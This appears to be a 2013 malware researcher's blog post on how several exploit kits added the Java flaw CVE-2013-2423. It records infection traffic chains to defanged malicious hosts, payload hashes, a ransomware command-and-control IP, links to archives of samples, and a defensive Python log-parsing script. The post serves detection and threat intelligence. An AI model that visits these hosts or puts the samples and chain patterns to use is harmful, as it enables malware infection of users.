2013-04-23 - Exploit Integration

CVE-2013-2423 integrating Exploit Kits



One week after the Java 7u21 patch, the vulnerability is being exploited in mass blind attacks.
(First alert came from Timo Hirvonen with CrimeBoss, and later CritXPack/SafePack. Will update for these EKs as soon as I land on them.)

Cool EK:
CVE-2013-2423 successful path in Cool EK 2013-04-23


GET http://lekarskiejowlslight.ahmedpekin .net/works-softly.htm
200 OK (text/html)

GET http://lekarskiejowlslight.ahmedpekin .net/hopeful_orchestra-surveyor_remove.jar
200 OK (application/java-archive) 9339cb68dd4a1301f8b84da55bacd6b4

CVE-2013-2423 in Cool EK Jar


GET http://95.211.[bip]/getqq.jpg  c795ac9a7a84930c4da54439026556c6  Reveton as usual.
200 OK (application/x-msdownload)

<edit1 2013-04-26>
Sweet-Orange :


CVE-2013-2423 positive path in Sweet Orange 2013-04-26
GET http://prioritiesinformationlockdown .net/upgrade/uploads/photo/pets.php?spamnav=237
200 OK (text/html)

<edit5 2013-04-27> The Security Bypass has been added.
Looks like this:
Security bypass implemented in Sweet Orange 2013-04-27

</edit5>
GET http://prioritiesinformationlockdown .net/upgrade/uploads/photo/bDCoZGmn.jar
200 OK (application/x-java-archive) d4a716a6434462ddd1b99a85f3d9cf87

CVE-2013-2423 in SWT


GET http://prioritiesinformationlockdown .net/upgrade/uploads/photo/KOrJjsK.jar
200 OK (application/x-java-archive) 49ca9dcbf4cc7176bb656ded3eb03dba



GET http://prioritiesinformationlockdown .net/iraq.php?setup=750&humor=598&star=4&virus=629&entry=171&paper=545&stars=451&intm=257&books=550&myguest=958
200 OK (application/octet-stream) Decoded payload : f94c16dc1c399849e37064e17c5337e1 (Ransomware c&c http://utrento .com/picture.php )


Unidentified (for now) ransomware landing page for the UK
</edit1>
<edit3 2013-04-27>
Neutrino :


"Добавлен новый эксплоит, пробив приятно поднялся ;)"
Translated as:
Added a new exploit, the infection rate went up nicely ;)

CVE-2013-2423 in Neutrino 2013-04-27 with Security Bypass


Security Bypass (as explained by Immunity) in Neutrino, after some decoding
<edit 2013-06-26: after a comment, here is more data: http://pastebin.com/raw.php?i=NfYC76Zi (JNLP after Base64 decode) />
GET http://evaluation-man .net/ldeiyxlmeiujjn?fqemlffr=5884689
200 OK (text/html)

GET http://ajax.googleapis .com/ajax/libs/jquery/1.9.1/jquery.min.js
200 OK (text/javascript)

GET http://evaluation-man .net/scripts/js/plugin_detector.js
200 OK (application/x-javascript)

POST http://evaluation-man .net/cvwrssa
200 OK (text/html)

GET http://evaluation-man .net/eqtmw?hvvsxlyebdkj=517ba030aaa2cc8561032cc5
200 OK (application/java-archive)  4387db4a1da8f8f68df4369f8e6d46b6


CVE-2013-2423 in Neutrino Jar


GET http://evaluation-man .net/puvpdxcfdwntco?htigpfblxyx=517ba030aaa2cc8561032cc5
200 OK (application/octet-stream) Decoded payload : a69ffadf3d021f3edfb7b811e2fcb753 Urausy

Part of Urausy LU Design 2013-04-27



File: Neutrino_CVE-2013-2423.zip (OwnCloud via goo.gl)
</edit3>
<edit4 2013-04-27>
Sakura :


CVE-2013-2423 & Security Bypass successful path in Sakura EK
GET http://ef4g.stencilmaster1 .com:88/page/word.php
200 OK (text/html)

Security Bypass in Sakura (after partial deobfus) - 2013-04-27


GET http://ef4g.stencilmaster1 .com:88/page/important_whole_mile.php
200 OK (application/x-java-archive) b7c19737bcbeb0613ade20b71e2797fe

CVE-2013-2423 in Sakura Jar file 2013-04-27
GET http://ef4g.stencilmaster1 .com:88/page/3906.htm
200 OK (application/octet-stream)  Decoded payload : 1ecc8081e6fe50c886735c45e788d16d


Part of Urausy NL Design 2013-04-27


Files : Sakura_Landing_Jar_Payload_CVE-2013-2423.zip (OwnCloud via goo.gl)
</edit4>
<edit6 2013-04-27>
Styx :
For at least 3 hours it was serving that jar without infecting... it now appears to be fully operational.
Successful CVE-2013-2423 + Security bypass in Styx
+ Payload Urausy Call Home
GET http://1perfotas.gotgeeks .com/kgMXp60Bral0l2gu0T3h311sSh0gspW12nyO0jyQj0Clcm0APFy0tlNV06MeW0KUSX/
200 OK (text/html)

GET http://1perfotas.gotgeeks .com/kgMXp60Bral0l2gu0T3h311sSh0gspW12nyO0jyQj0Clcm0APFy0tlNV06MeW0KUSX/jrr.html
200 OK (text/html)

Embedded jnlp for Security Bypass


GET http://1perfotas.gotgeeks .com/kgMXp60Bral0l2gu0T3h311sSh0gspW12nyO0jyQj0Clcm0APFy0tlNV06MeW0KUSX/sdghsHHj.jar
200 OK (text/html) 702ad790017148b8eedd46ce5599a06f

CVE-2013-2423 in Styx Jar 2013-04-27


GET http://1perfotas.gotgeeks .com/OoTtsV0poEU0xnad0KaY910BMP0MRvW0emfi0nW3n0rEFd06afI0di5J0QjCx0OufD06IHF0CViI0ZVum0V3tm0zzAk14xMn0TcLD01PmR0nee80H9JU0Rdwk12WwY09mps0ZYSm0nX5o0OhKa17Z8N16eY5126Nc0hQ6m0ML3m0gjjR0EYoV0tEYB14CSM0GpRt0unAj0dUrn0vhxG0htLK12MMq0SNVP0OGdP/Er3jvhs7jf.exe?fJ2pf=XUaPp&h=13
200 OK (application/octet-stream)  Payload decoded (for now...) 1f9d504d0c3ad25ca42fbc661070d075 Urausy again...

Part of Urausy US Design 2013-04-27
Files: Styx_Landing_SecurityBypass_Jar_Payload_2013-04-27.zip
</edit6>
<edit7 2013-04-30>
Redkit:
Spotted by @UnicornSec on 2013-04-29
CVE-2013-2423 in Redkit 2013-04-30
GET http://electricfireplaceheater .net/wnqm.html
200 OK (text/html)

GET http://electricfireplaceheater .net/roh.jnlp
200 OK (text/html)

GET http://electricfireplaceheater .net/aae.jnlp
200 OK (text/html)

Redkit jnlp for Security Bypass 2013-04-30


GET http://electricfireplaceheater .net/qv3.jar
200 OK (application/java-archive) 5623b9a385e3eec21bf4d5d2fe63e45d

CVE-2013-2423 in Redkit Jar 2013-04-30
GET http://electricfireplaceheater .net/11.html
200 OK (application/octet-stream)

Out of scope, but here are the payloads:
1: 8586611fc023048abac469bfe681117b
2: cf0ae96521b423ebe10593e7de1f6a9c (it's Karagny, I think)
3: b9e6d133e163b0d0e4efb144316d528e
4: 280683d62667a7bd8411565fd212707f
5: 5de26a11e59a84368db5f56cc9c997cc Zaccess
6: 13bd23da493896001f6d107f1bf1afc0

Files : Redkit_CVE-2013-2423_2013-04-30.zip (OwnCloud via goo.gl)


Nuclear Pack :
Announced on multiple underground forums since 2013-04-27

добавлен новый Java exploit
пробив увеличился в 2 раза!!
Работает тих без окон!!!

Translated by Google as:

added a new Java exploit
breaking increased by 2 times!
Runs quiet with no windows!

Thanks to Chris Wakelin, who spotted it and shared the referrer.

CVE-2013-2423 successful path In Nuclear Pack 2013-04-30
GET http://exhaustedpcscreen .biz:38895/f2b0557f683e6c422931704802693850.html
200 OK (text/html)
http://wepawet.iseclab.org/view.php?hash=6d3b3650005593ab6955750c2f7e2097&type=js

Landings interpreted by Wepawet
Base64 decode of the Security Bypass "zone"
GET http://exhaustedpcscreen .biz:38895/2d3a14952063b1bba31bd5613d62d58e/1367323505/539816c0e7725da387899afdc64a602c.jar
200 OK (application/java)  ac29a615ec7ff5d3f238effca6e9095d

CVE-2013-2423 in a Nuclear Pack  jar 2013-04-30
GET http://exhaustedpcscreen .biz:38895/f/1367323505/539816c0e7725da387899afdc64a602c/2d3a14952063b1bba31bd5613d62d58e/2
200 OK (application/octet-stream) a2fcdd67062b8cd866b4a642277f24e2 Citadel

GET http://exhaustedpcscreen .biz:38895/f/1367323505/539816c0e7725da387899afdc64a602c/2d3a14952063b1bba31bd5613d62d58e/2/2
200 OK (application/octet-stream)

SofosFO/StampEK :
CVE-2013-2423 positive path in SofosFO/Stamp EK
GET http://cubicle.zeusfte .biz/switzerallege-schematic
200 OK (text/html)

GET http://cubicle.zeusfte .biz/kkethh1yogmrErparmDQGwe4gerparGg/FGZa2../prosperity.php5
200 OK (text/html)

GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/901212121255
200 OK (text/html)

Security Bypass in SofosFO/Stamp EK 2013-04-30


GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/name.jar
200 OK (text/html)

GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/9013312341/double.jar
200 OK (application/java-archive)

CVE-2013-2423 part in jar from SofosFO/StampEK


GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/name.jar
200 OK (text/html)

GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/95555555555551/1704114
200 OK (application/java-archive) Decoded Payload : 0bfc916bd2c95a98234b19c8976686a5 (Reveton...seems Cool EK is facing troubles. Distribution moved to SofosFO and Sweet Orange).

Piece of Reveton FR Design 2013-04
C&C : 69.197.217.85

Connection to Reveton C&C 2013-04-30

Entry point: FG00


GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/MyApplet.class
200 OK (text/html)


Files : SofosFO_CVE-2013-2423_Reveton_SecuByP.zip (OwnCloud via goo.gl)
</edit7>
<edit8 2013-05-01>
Sibhost :


CVE-2013-2423 successful path in Sibhost
(URLs removed because it's a "forged" link)
GET http://[Redacted]/f9Jzvl7ISTKuzd4f4OyG1LEyb0V41RpxfMyLu
200 OK (text/html)
Security Bypass (embedded jnlp in the landing) in Sibhost 2013-05-01

GET http://[Redacted]/deployJava.js
200 OK (application/javascript)

GET http://[Redacted]/deployJava.js
200 OK (application/javascript)

GET http://[Redacted]/f9Jzvl7ISTKuzd4f4OyG1LEyb0V41RpxfMyLu2.zip
200 OK (application/octet-stream) e041223ecd039e5a01f8e4cac5ca9c96

CVE-2013-2423 in Sibhost Jar 2013-05-01
(including encoded payload - Urausy)


Decoded payload :  3bce54da0e5a8f1c56787c60b389ff56 (Urausy as always on this Exploit kit)


Part of Urausy LU design 2013-05-01


POST http://[Redacted]/f9Jzvl7ISTKuzd4f4OyG1LEyb0V41RpxfMyLu?id=2
200 OK (text/html) (<- stats callback)


</edit8>
<edit9 2013-05-06>
WhiteHole :
CVE-2013-2423 in WhiteHole 2013-05-06
GET http://1367825417.hopto .org/temp/newyear/d0e3c0b/?cmp=98
200 OK (text/html)

Security Bypass in WhiteHole 2013-05-06

GET http://1367825417.hopto .org/temp/newyear/deployJava.js
200 OK (application/javascript)

GET http://1367825417.hopto .org/temp/newyear/2b075/?java=98
200 OK (text/html)

GET http://1367825417.hopto .org/temp/newyear/JavaN.jar?java=98
200 OK (application/java-archive) b36e2a4326d80fdd605650363cae50a9

GET http://1367825417.hopto .org/temp/newyear/JavaZ.jar?java=98
200 OK (application/java-archive) a46b973d293fc787905a0d6d9d103eb3 < CVE-2013-2423

CVE-2013-2423 in WhiteHole Jar


GET http://1367825417.hopto .org/temp/newyear/418116071/?whole=98
302 Found to http://1367825417.hopto .org/temp/softl98ii.exe

GET http://1367825417.hopto .org/temp/softl98ii.exe
200 OK (application/x-msdos-program) 1d7dc35322dcc21e84bd72eafc2b167d < Urausy

Part of Urausy BE Design 2013-05-06


GET http://1367825417.hopto .org/temp/newyear/1043553559/?whole=98
504 Gateway Time-out (text/html)

GET http://1367825417.hopto .org/temp/newyear/418116071/?whole=9802
504 Gateway Time-out (text/html)

GET http://1367825417.hopto .org/temp/newyear/1043553559/?whole=9802
504 Gateway Time-out (text/html)

GET http://1367825417.hopto .org/temp/newyear/418116071/?whole=9803
504 Gateway Time-out (text/html)

GET http://1367825417.hopto .org/temp/newyear/1043553559/?whole=9803
504 Gateway Time-out (text/html)


Files : WhiteHole_CVE-2013-2423.zip (OwnCloud via goo.gl)
</edit9>
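The chains above share one shape: a landing page, a JNLP or jar stage, then an octet-stream or x-msdownload payload from the same host, with the jar sometimes answered as text/html (Styx, SofosFO). As an added example not from the original post, this Python script parses traffic notes written in the page's own request/response layout (constructed sample, placeholder hosts, fake hashes) and flags both patterns.

```python
import re
from urllib.parse import urlparse

# Constructed sample in the page's request/response layout; placeholder hosts, fake hashes.
SAMPLE_LOG = """\
GET http://ek.example.test/works-softly.htm
200 OK (text/html)
GET http://ek.example.test/roh.jnlp
200 OK (text/html)
GET http://ek.example.test/hopeful.jar
200 OK (application/java-archive) 00000000000000000000000000000001
GET http://ek.example.test/getqq.jpg
200 OK (application/x-msdownload) 00000000000000000000000000000002
GET http://other.example.test/sdghsHHj.jar
200 OK (text/html) 00000000000000000000000000000003
"""

REQ_RE = re.compile(r"^(GET|POST)\s+(\S+)")
RESP_RE = re.compile(r"^(\d{3})\s+[^(]*\(([^)]+)\)\s*([0-9a-f]{32})?")
JAVA_TYPES = {"application/java-archive", "application/x-java-archive", "application/java"}
EXE_TYPES = {"application/octet-stream", "application/x-msdownload", "application/x-msdos-program"}

def parse_log(text):
    """Pair each request line with the response line that follows it."""
    entries, pending = [], None
    for line in text.splitlines():
        if m := REQ_RE.match(line):
            pending = {"url": m.group(2)}
            continue
        if (m := RESP_RE.match(line)) and pending:
            pending.update(status=int(m.group(1)), ctype=m.group(2).strip(), md5=m.group(3))
            entries.append(pending)
            pending = None
    return entries

def find_ek_chains(entries):
    """Per host: flag an executable served after a Java stage, and a .jar answered as text/html."""
    by_host, findings = {}, []
    for e in entries:
        by_host.setdefault(urlparse(e["url"]).hostname, []).append(e)
    for host, reqs in by_host.items():
        java_seen = False
        for e in reqs:
            path = urlparse(e["url"]).path.lower()
            if path.endswith(".jar") and e["ctype"] == "text/html":
                findings.append((host, "jar-served-as-html", e["url"]))
            java_seen = java_seen or e["ctype"] in JAVA_TYPES or path.endswith((".jar", ".jnlp"))
            if java_seen and e["ctype"] in EXE_TYPES:
                findings.append((host, "exe-after-java-stage", e["url"]))
    return findings
```

Run it on a proxy export converted to the same two-line layout; a hit on either rule is a reason to pull the jar and the payload for analysis.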

Reading :
CVE-2013-2423 on mitre
CVE-2013-2423 Metasploit Module
Java is So Confusing... - Trustwave/Spiderlabs - Anat Davidi -2013-04-19
Java 7 Update 21 - IKVM.Net Weblog - 2013-04-17
Post Publication Readings :
Yet Another Java Security Warning Bypass - Immunity - 2013-04-24 - Esteban Guillardoy
The Latest Java Exploit with Security Prompt/Warning Bypass (CVE-2013-2423) - Security Obscurity - 2013-04-26
K.I.A. – Java CVE 2013-2423 Via New and Improved Cool EK - Anup Ghosh - Invincea - 2013-04-26
